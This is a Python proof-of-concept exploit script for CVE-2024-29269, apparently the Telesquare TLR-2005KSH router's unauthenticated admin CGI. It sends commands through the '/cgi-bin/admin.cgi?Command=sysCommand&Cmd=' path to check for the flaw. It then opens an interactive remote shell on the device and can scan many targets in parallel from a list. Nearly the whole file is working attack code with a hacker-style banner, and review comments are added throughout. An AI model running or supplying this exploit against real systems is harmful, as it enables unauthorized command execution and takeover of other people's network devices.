#!/usr/bin/env python3
import requests
import argparse
import concurrent.futures
from rich.console import Console
from alive_progress import alive_bar
import xml.etree.ElementTree as ET
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress urllib3's InsecureRequestWarning for the whole process. The requests
# issued by this script pass verify=False, so TLS certificates are not
# validated; with the warning silenced, nothing on the console reports that.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Shared rich console used for the coloured status output in this script.
console = Console()
def ascii_art():
    """Print the startup banner and the author credit line.

    The banner rows go through the shared rich console so the colour markup
    is rendered; the blank lines and the credit line use plain print().
    """
    banner_rows = (
        "[bold bright_magenta] ██████ ██ ██ ███████ ██████ ██████ ██████ ██ ██ ██████ █████ ██████ ██████ █████[/bold bright_magenta]",
        "[bold bright_magenta]██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██[/bold bright_magenta]",
        "[bold bright_magenta]██ ██ ██ █████ █████ █████ ██ ██ ██ █████ ███████ █████ █████ ██████ █████ ███████ ██████[/bold bright_magenta]",
        "[bold bright_magenta]██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██[/bold bright_magenta]",
        "[bold bright_magenta] ██████ ████ ███████ ███████ ██████ ███████ ██ ███████ █████ ███████ ██████ █████[/bold bright_magenta]",
    )
    print("")
    for row in banner_rows:
        console.print(row)
    print("")
    print("Coded By: K3ysTr0K3R")
    print("")
# Command sent by the vulnerability check in exploit().
test_cmd = "ifconfig"

# Request path appended to the target URL; the command text is concatenated
# directly after "Cmd=" with no encoding. Requests for this path and query
# string are what a defender would look for in the device's web access logs.
path = "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="

# Substrings searched for in the response body. exploit() treats a response
# that contains any one of them as a positive result.
matcher = ['<CmdResult>', '</xml>', 'Ethernet', 'inet']

# Fixed User-Agent sent with every request made by this script.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Linux; Android 6.0.1; vivo 1603 Build/MMB29M) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/58.0.3029.83 Mobile Safari/537.36"
    )
}
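def exploit(target):
    """Send the fixed test command to *target* and report whether the reply matches.

    The request URL is ``target + path + test_cmd``, sent as an
    unauthenticated GET with the module-level ``headers``, a 10 second
    timeout and TLS verification disabled (``verify=False``).

    Args:
        target: Base URL of the device, including the scheme.

    Returns:
        True when the response body contains at least one entry of
        ``matcher``; False otherwise, including when the request fails or
        ``raise_for_status()`` rejects the HTTP status.
    """
    url = target + path + test_cmd
    try:
        response = requests.get(url, timeout=10, headers=headers, verify=False)
        response.raise_for_status()
    except requests.exceptions.RequestException:
        return False

    # NOTE(review): a single marker is enough for a hit, and generic strings
    # such as "inet" or "</xml>" can occur in unrelated pages, so a True
    # result is an indication rather than a confirmation.
    if any(marker in response.text for marker in matcher):
        console.print(f"[bold bright_green][+][/bold bright_green] The target appears to be vulnerable: [bold bright_cyan]{target}[/bold bright_cyan]")
        return True

    # The original fell off the end here and returned None; return an explicit
    # False so every path yields a bool.
    return False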
def execute_command(target, cmd, headers):
    """Request the admin CGI with *cmd* appended and return the <CmdResult> text.

    Args:
        target: Base URL of the device, including the scheme.
        cmd: Command text, concatenated onto the URL as-is (no encoding).
        headers: HTTP headers to send with the request.

    Returns:
        The stripped text of every ``CmdResult`` element in the XML reply,
        joined with newlines, or None when the request fails or the body is
        not well-formed XML.
    """
    command_url = "".join((target, path, cmd))
    try:
        reply = requests.get(command_url, timeout=10, headers=headers, verify=False)
        reply.raise_for_status()
        # NOTE(review): the body comes from the remote host and is parsed with
        # xml.etree.ElementTree, which the Python documentation describes as
        # not secure against maliciously constructed data.
        document = ET.fromstring(reply.content)
        # NOTE(review): .text is None for an empty element, so .strip() raises
        # AttributeError in that case; neither handler below catches it.
        return "\n".join(
            node.text.strip() for node in document.findall('.//CmdResult')
        )
    except requests.exceptions.RequestException as err:
        console.print(f"[red][-][/red] Error executing command: {err}")
        return None
    except ET.ParseError:
        # Malformed XML is treated the same as "no output", without a message.
        return None
def interactive_shell(target, headers):
    """Read lines from a prompt and pass each one to execute_command().

    The typed line is stripped before use. "exit" and "clear" (compared
    case-insensitively) are handled locally: the first ends the loop, the
    second calls clear_console(). Every other line is sent to *target* and
    the returned text is printed. Ctrl-C (KeyboardInterrupt) also ends the loop.

    Args:
        target: Base URL of the device, including the scheme.
        headers: HTTP headers forwarded to execute_command().
    """
    console.print("[blue][*][/blue] Initiating interactive shell")
    session = PromptSession(history=InMemoryHistory())
    console.print("[bold bright_green][+][/bold bright_green] Interactive shell opened successfully")
    while True:
        try:
            line = session.prompt(HTML("<ansicyan><b>Shell> </b></ansicyan>"), default="").strip()
            keyword = line.lower()
            if keyword == "exit":
                break
            if keyword == "clear":
                clear_console()
                continue
            output = execute_command(target, line, headers)
            # A None result (failed request or unparsable reply) and an empty
            # string are reported the same way.
            if not output:
                console.print("[red][-][/red] No output from command")
            else:
                print(output)
        except KeyboardInterrupt:
            console.print("[red][-][/red] Exiting interactive shell")
            break
def clear_console():
    """Write the ESC c control sequence to stdout, with no trailing newline."""
    reset_sequence = "\033c"
    print(reset_sequence, end="")
def scan_from_file(file_path, threads):
    """Run exploit() against every non-blank line of *file_path* on a thread pool.

    Args:
        file_path: Text file with one target URL per line; surrounding
            whitespace is stripped and blank lines are skipped.
        threads: ``max_workers`` for the ThreadPoolExecutor.

    Positive results are printed by exploit() itself; this function only
    advances the progress bar as each task completes.
    """
    with open(file_path, 'r') as handle:
        targets = []
        for raw_line in handle:
            entry = raw_line.strip()
            if entry:
                targets.append(entry)

    with alive_bar(len(targets), title="Scanning targets", bar="blocks", enrich_print=False) as bar, \
            concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        pending = {executor.submit(exploit, entry): entry for entry in targets}
        # The futures' results are never read, so an exception raised inside a
        # worker is not surfaced here.
        for _finished in concurrent.futures.as_completed(pending):
            bar()
def main():
    """Parse the command line and dispatch to file scanning or single-target mode.

    With ``--file`` the targets in that file are checked via scan_from_file().
    With ``--url`` the single target is checked by exploit(); a positive
    result opens interactive_shell(), a negative one prints a message and
    exits. ``--file`` takes precedence when both are given. With neither
    option the help text is printed.
    """
    ascii_art()
    parser = argparse.ArgumentParser(description="A PoC exploit for CVE-2024-29269 - Telesquare TLR-2005KSH Remote Code Execution (RCE)")
    parser.add_argument('-u', '--url', help="Single URL to exploit.")
    parser.add_argument('-f', '--file', help="File containing URLs to scan.")
    parser.add_argument('-t', '--threads', type=int, default=5, help="Number of threads to use for scanning.")
    args = parser.parse_args()

    if args.file:
        scan_from_file(args.file, args.threads)
        return

    if not args.url:
        parser.print_help()
        return

    console.print("[blue][*][/blue] Checking if the target is vulnerable")
    if not exploit(args.url):
        console.print("[red][-][/red] The target does not appear to be vulnerable")
        exit()
    interactive_shell(args.url, headers)


if __name__ == "__main__":
    main()